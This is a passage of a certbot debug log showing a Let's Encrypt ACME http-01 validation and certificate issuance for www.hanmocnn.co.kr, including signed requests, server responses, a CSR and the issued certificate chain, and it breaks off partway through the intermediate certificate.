'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'} -2026-02-14 22:37:00,840:INFO:certbot._internal.auth_handler:Performing the following challenges: -2026-02-14 22:37:00,840:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='www.hanmocnn.co.kr') -2026-02-14 22:37:00,840:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. -2026-02-14 22:37:00,841:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge -2026-02-14 22:37:00,842:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo -2026-02-14 22:37:00,843:DEBUG:acme.client:JWS payload: -b'{}' -2026-02-14 22:37:00,847:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnNzN1g5cVF5UW55ZUt3VUJlb0ZCTlBJaXE2Y00wUVdhVmYyLVVPUnlzY0EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2L1dvcllFdyJ9", - "signature": "V9gJFKwdEeNbkiteGzJnt2imLg86cSLCFMkKmbVxzDIE9lZUZqYPJdq6U_BH45GwSAHmJGYNC4aSzFz6Axsyojnnem419sFjBw0cEF_CqDqmDkRiPOHOm4EpGxRC9fIYPPR43vXDAeGR_5o0M2CR0RAHOoqmweih8O3wYx6vsMPYUk_hDYaykd7EPNt1o7HVITqdfsAEcfRHo7D6o01egijhdDjHuzy5mwXzi88VyBNtsRm7VY4oj_14HwH-y1ehZnlFidof7FkG2drlL70uG5uoC5H7x8GaagJHDPV7xYjWm91p_ElcK5QNUngXw9sYeuMwGbTZTQEbfteif80rCg", - "payload": "e30" -} -2026-02-14 22:37:01,026:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658763864386/WorYEw HTTP/1.1" 200 195 -2026-02-14 22:37:01,027:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:00 GMT -Content-Type: application/json -Content-Length: 195 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="up" -Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw -Replay-Nonce: qLPTsdtfcTzEfvOVlnCkQVlTu9z3A5NW8JFOBehHtJSEWrRy7Gk -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" -} -2026-02-14 22:37:01,027:DEBUG:acme.client:Storing nonce: qLPTsdtfcTzEfvOVlnCkQVlTu9z3A5NW8JFOBehHtJSEWrRy7Gk -2026-02-14 22:37:01,028:INFO:certbot._internal.auth_handler:Waiting for verification... -2026-02-14 22:37:02,028:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:37:02,033:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmNUekVmdk9WbG5Da1FWbFR1OXozQTVOVzhKRk9CZWhIdEpTRVdyUnk3R2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0", - "signature": "XXADX0L4Qrbg3ERRW4CsnjWzKwsDJUkJdZX7a9xtX3gh0KgdJGOfXkdpcx7qttBvXus85dJ7QA25ZKXLNNqARxpoJDeP9pr73ZZYYB7Fwt9wyVSQ-yreoINf6zkJbyvVWLQPIXIvty7xvwMDqhTXS1Q1A_OsPcpz8s1tYWr8pDWgzvrT7EJKSm3MUzOcZtuBqMMGlBeKwfuXmVhJCO5JADAM7gOrvRviojM5RY6XkKKUFCAn8TSQupuUKNKEYRI_zksrj6KWJdalvT5jlTLXDlfBhnjPiaT-MR_xV-_B2PAkiH1JiRGsGPHkiroCqN20WV4Ru1cDjzXybn6Q8LH6Ow", - "payload": "" -} -2026-02-14 22:37:02,211:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826 -2026-02-14 22:37:02,212:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:02 GMT -Content-Type: application/json -Content-Length: 826 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfrOZM6pTRJ4EJQ8GVGPpmxiHIzMVbeb8qS9Im2CeQvr0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "www.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T22:37:00Z", - "challenges": [ - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - } - ] -} -2026-02-14 22:37:02,212:DEBUG:acme.client:Storing nonce: QkEzerAfrOZM6pTRJ4EJQ8GVGPpmxiHIzMVbeb8qS9Im2CeQvr0 -2026-02-14 22:37:02,213:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'} -2026-02-14 22:37:05,213:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:37:05,218:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnJPWk02cFRSSjRFSlE4R1ZHUHBteGlISXpNVmJlYjhxUzlJbTJDZVF2cjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0", - "signature": "xgjZ-8HW8sNrxs3JL8y5PoqZpwY0ieg3tRCZB1WKBlmFahkLg4oGGoVRo69CDo4Mo6XcEvbPIhhvihqxwkBjMWutSOuyrNbAGhnt70aJ8I-Mk4oQVKjvREs3FG9Lx2CjBC9CxXOJV4GKeBlalRA_kvUjqMvHcczfNWY0jREsvMlSAJPxVc982wr8oRepVP8HMCp7fXMtcIj25rD1Eq-IT68kngbRx73a6tO10Q78Qea4HVM1xGKl-OwCCjdwPIBUuSs6v8REwYjtoUBdNB6iry6Bh5TjUJGZY6KGjGYYaNtyBwjCw_zyUbWxXdQofPKcPeLUHfcN1y-K8kpri0-Bdw", - "payload": "" -} -2026-02-14 22:37:05,396:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826 -2026-02-14 22:37:05,397:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:05 GMT -Content-Type: application/json -Content-Length: 826 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtf5E_tE0oZ9wXt2UihFzz5Hj2_fQraJrZY1ZcVaYjHops -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "www.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T22:37:00Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - } - ] -} -2026-02-14 22:37:05,397:DEBUG:acme.client:Storing nonce: qLPTsdtf5E_tE0oZ9wXt2UihFzz5Hj2_fQraJrZY1ZcVaYjHops -2026-02-14 22:37:05,397:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'} -2026-02-14 22:37:08,398:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:37:08,403:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjVFX3RFMG9aOXdYdDJVaWhGeno1SGoyX2ZRcmFKclpZMVpjVmFZakhvcHMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0", - "signature": "AWB5-r41LjGxMZKcCfb_inrjOcjW4O9dkvUox3c_KIMn5qqzDTMnymKL4ilAXge0HM_g_rbIs8gDYHFvRpGPPxLxhg66ayoYKDypjAeeK5Z2884KK8zRBAlhdS_CXny-hl-hUcTO9y9VZOTKwoT0QEKUE3N-g2qrKJkhSkN6x6zSDo1OKx_oVdiM65VwCXk0p556topXMj8iyAnuOAYkMxId-vsPYGxZVRocPofhwaxChxkfC21B8gysD57qEdfbjN8yk5nBo3IzipeZOvYlTTN8mimf5c0-4DVLnnEvpvWYxOQdTUYyrxXTuPvF-I0vrc2jh1d4h6G7H6LbI7Io3g", - "payload": "" -} -2026-02-14 22:37:08,590:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777 -2026-02-14 22:37:08,591:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:08 GMT -Content-Type: application/json -Content-Length: 777 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfBWhgCrRIv-bvqdsH1Pi3gqZOHr3atrovjCPJmZbuetI -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "www.hanmocnn.co.kr" - }, - "status": "valid", - "expires": "2026-03-16T22:37:07Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw", - "status": "valid", - "validated": "2026-02-14T22:37:00Z", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo", - "validationRecord": [ - { - "url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo", - "hostname": "www.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "222.117.41.51" - ], - "addressUsed": "222.117.41.51" - } - ] - } - ] -} -2026-02-14 22:37:08,591:DEBUG:acme.client:Storing nonce: QkEzerAfBWhgCrRIv-bvqdsH1Pi3gqZOHr3atrovjCPJmZbuetI -2026-02-14 22:37:08,592:DEBUG:certbot._internal.error_handler:Calling registered functions -2026-02-14 22:37:08,592:INFO:certbot._internal.auth_handler:Cleaning up challenges -2026-02-14 22:37:08,592:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo -2026-02-14 22:37:08,593:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up -2026-02-14 22:37:08,593:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE/MAxS8qM7lfOK0GC\npkjFK+Gtq7W+m3A7S1v2CpGQ0QyVjglgLTeIEDMmfz/rVDpxJMw9BjlYx3ncotfZ\nFqm+alkg1CSB8uzGmv4wVZO9YMqgq1NYmn1+3b6avJBh6JgPoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJ3d3cuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaQAwZgIxAKGLPAScVN7hS9XlaMdBbDMcfh+wj4pxQGFHZkuhZrDuevlNdKCY\n0jsVVWXbfjb5PgIxAPHhxjm8bbjXCwGTDlr+A5j+UjLbDzD0eAJAZMnr7AhEghuo\nWP+aZVUJiVAxp0Q5Iw==\n-----END CERTIFICATE REQUEST-----\n', form='pem') -2026-02-14 22:37:08,593:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 22:38:38.593873 -2026-02-14 22:37:08,594:DEBUG:acme.client:JWS payload: -b'{\n "csr": "MIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE_MAxS8qM7lfOK0GCpkjFK-Gtq7W-m3A7S1v2CpGQ0QyVjglgLTeIEDMmfz_rVDpxJMw9BjlYx3ncotfZFqm-alkg1CSB8uzGmv4wVZO9YMqgq1NYmn1-3b6avJBh6JgPoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJ3d3cuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaQAwZgIxAKGLPAScVN7hS9XlaMdBbDMcfh-wj4pxQGFHZkuhZrDuevlNdKCY0jsVVWXbfjb5PgIxAPHhxjm8bbjXCwGTDlr-A5j-UjLbDzD0eAJAZMnr7AhEghuoWP-aZVUJiVAxp0Q5Iw"\n}' -2026-02-14 22:37:08,598:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZkJXaGdDclJJdi1idnFkc0gxUGkzZ3FaT0hyM2F0cm92akNQSm1aYnVldEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzU1Nzk0OTc2In0", - "signature": "iRmbifxypVg8beho7vSjGtACjPanmSlW6Od_8g-3_3CiynaNwdPlfAeyza11sHzYYzq2D7SXqGLW_5zo4mk6m1O-gbVSFrCIdsyyjm28za5gZ6f7uJaOOONmQ8LIwA58r5kF8Xe_YUO7O-ZVMuL0YetMMdvENavksjcQ4Q9QqRRTFjYOlDsl3O-H2Gzz9y-5g_gZwmPKJH4ZeQZUhiaXLNTEZ3NbdciLkdHqiMv_szkwwZiUfsrcuRD4ci3drTQqOQwFlCbP6m8twuINoFRDnMmCL5EKETp-fOxR3OGaAYhWrk7Pb4uQJRLkpfYggh1Wp2TIS24klJaYP4DfIUSh0w", - "payload": "ewogICJjc3IiOiAiTUlJQktUQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFX01BeFM4cU03bGZPSzBHQ3BrakZLLUd0cTdXLW0zQTdTMXYyQ3BHUTBReVZqZ2xnTFRlSUVETW1mel9yVkRweEpNdzlCamxZeDNuY290ZlpGcW0tYWxrZzFDU0I4dXpHbXY0d1ZaTzlZTXFncTFOWW1uMS0zYjZhdkpCaDZKZ1BvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKM2QzY3VhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhUUF3WmdJeEFLR0xQQVNjVk43aFM5WGxhTWRCYkRNY2ZoLXdqNHB4UUdGSFprdWhackR1ZXZsTmRLQ1kwanNWVldYYmZqYjVQZ0l4QVBIaHhqbThiYmpYQ3dHVERsci1BNWotVWpMYkR6RDBlQUpBWk1ucjdBaEVnaHVvV1AtYVpWVUppVkF4cDBRNUl3Igp9" -} -2026-02-14 22:37:09,976:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480355794976 HTTP/1.1" 200 454 -2026-02-14 22:37:09,977:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:09 GMT -Content-Type: application/json -Content-Length: 454 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976 -Replay-Nonce: QkEzerAfsv9nV3Qq348LLnOxB92Qa-jIqeyURxhV7CClV-KNAmg -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-21T22:37:00Z", - "identifiers": [ - { - "type": "dns", - "value": "www.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c" -} -2026-02-14 22:37:09,978:DEBUG:acme.client:Storing nonce: QkEzerAfsv9nV3Qq348LLnOxB92Qa-jIqeyURxhV7CClV-KNAmg -2026-02-14 22:37:10,978:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:37:10,983:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnN2OW5WM1FxMzQ4TExuT3hCOTJRYS1qSXFleVVSeGhWN0NDbFYtS05BbWciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzU1Nzk0OTc2In0", - "signature": "LtmzCt3fpthHfOuEe9PwhlSNbmXHLo8UAzVQ-ymmBpQEBYovhfGYvpBYizq7wKOLelz9oniGzPfAv-taGt7iHnrxs7qjW62KK58QVHItk47Ifdq2KAUjxYKG4yAHoxs_bkmxNngkWadBt4fn31PEQH9e4HTiO2Dh34A13V_o5vsDrugGP9fJ4WuEmewUhyqil2pz7FWqwpwkDJdtpEi_zbEdUVTuCg8UwwZfJPXGRUVWyhQVftmzJkW-RLqDWM--JUAZk4cGFsNecrY9c8WqIi4cG7ifIM-7Kc21ryX_Bvnki-egnCNyV8WSykWdKtzzPuNYkPVKD4euM4y9NNpZ-w", - "payload": "" -} -2026-02-14 22:37:11,173:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480355794976 HTTP/1.1" 200 454 -2026-02-14 22:37:11,174:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:11 GMT -Content-Type: application/json -Content-Length: 454 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976 -Replay-Nonce: qLPTsdtftOchIQ67pfn4fKf79QhHr462qCSymeexd-q0zApziWM -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-21T22:37:00Z", - "identifiers": [ - { - "type": "dns", - "value": "www.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c" -} -2026-02-14 22:37:11,174:DEBUG:acme.client:Storing nonce: qLPTsdtftOchIQ67pfn4fKf79QhHr462qCSymeexd-q0zApziWM -2026-02-14 22:37:11,175:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:37:11,179:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZnRPY2hJUTY3cGZuNGZLZjc5UWhIcjQ2MnFDU3ltZWV4ZC1xMHpBcHppV00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZjMjNhODYzMTkxMzNjMmVhOTRiYWQ2MjMyYjgzZWRjODljIn0", - "signature": "QObbXJhGMj8ENq_5FuuPvJ8yHgVPCuys_JsABmNxTiw9xTW36mNVjZiJMWVEGFHVxM6ZGEZlzhWnnp0T3kbdmheU4LYto8C80WL5vp7h2a3ecjkqgeV3COGQ_QhVFbsAJY9rAtQ7CuO72r6VS8Tf1K_AEcbCBJzoqLJU55htt1jPmaEmAhUuKy9QFLcE5fGMtnzbP4nRW_swr-3tmm89-zC5-BJ5TuosNe8iZy6wjsm33i-AEhoIoS9BRfUZhSFxobsQb8pTV4_LYFKHjG1wgrx2XmWy4GWwN6E-NGH6jehlfPU22XBRSSmD4YobWbNHMs61CeO_y-cXUDpZGUlVrQ", - "payload": "" -} -2026-02-14 22:37:11,372:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06c23a86319133c2ea94bad6232b83edc89c HTTP/1.1" 200 2901 -2026-02-14 22:37:11,373:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:11 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2901 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: qLPTsdtf7TDw9twhO-dJQIwEaE7M6NSgQWEZQc1cW3y0Qsc0R3I -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDrDCCAzGgAwIBAgISBsI6hjGRM8LqlLrWIyuD7cicMAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -ODAeFw0yNjAyMTQyMTM4MzhaFw0yNjA1MTUyMTM4MzdaMB0xGzAZBgNVBAMTEnd3 -dy5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABPzAMUvKjO5X -zitBgqZIxSvhrau1vptwO0tb9gqRkNEMlY4JYC03iBAzJn8/61Q6cSTMPQY5WMd5 -3KLX2RapvmpZINQkgfLsxpr+MFWTvWDKoKtTWJp9ft2+mryQYeiYD6OCAh0wggIZ -MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E -AjAAMB0GA1UdDgQWBBTORiT+dlglG67cimuM1zKD3ELnZTAfBgNVHSMEGDAWgBSP -DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG -Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISd3d3Lmhhbm1vY25u -LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0 -dHA6Ly9lOC5jLmxlbmNyLm9yZy8yOS5jcmwwggELBgorBgEEAdZ5AgQCBIH8BIH5 -APcAdQBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxeTPmgAAAE -AwBGMEQCIGxlMBiH9/OnPSvVEujhbNVUSxq/r1Xngcn4TfBZaVGrAiAkIOVzdb/9 -6AKFMX/ElKQ+7I+hpxNt171wuuDeEjgLkAB+AOMjjfKNoojgquCs8PqQyYXwtr/1 -0qUnsAH8HERYxLboAAABnF5M/BQACAAABQAymAnXBAMARzBFAiEArvxAvG9uE2Tu -DDEeVhOZqlCxIN4TPjui3hiU+mrKZjkCIDizPzKN4wLVM22r8q+oVeOTtAsRHvGX -fwG9AX9le6neMAoGCCqGSM49BAMDA2kAMGYCMQCMzvyXShGR+CTivx802AAWc6AY -gthWXK7x71B1cXqasqwYOiDM+YUFwYHALE+u+iwCMQDMXxRf8NuIx6cPsKSX6vOc -O0tAcvgdvPwBxoXi5cg4Qa96OiXsH8KioJwDWPbj6xs= ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP -MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy -Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa -Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF -bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c -S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb -R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB -9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB -MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j -cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB -BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE -DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j -ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0 -RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d -AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8 -otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA -aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm 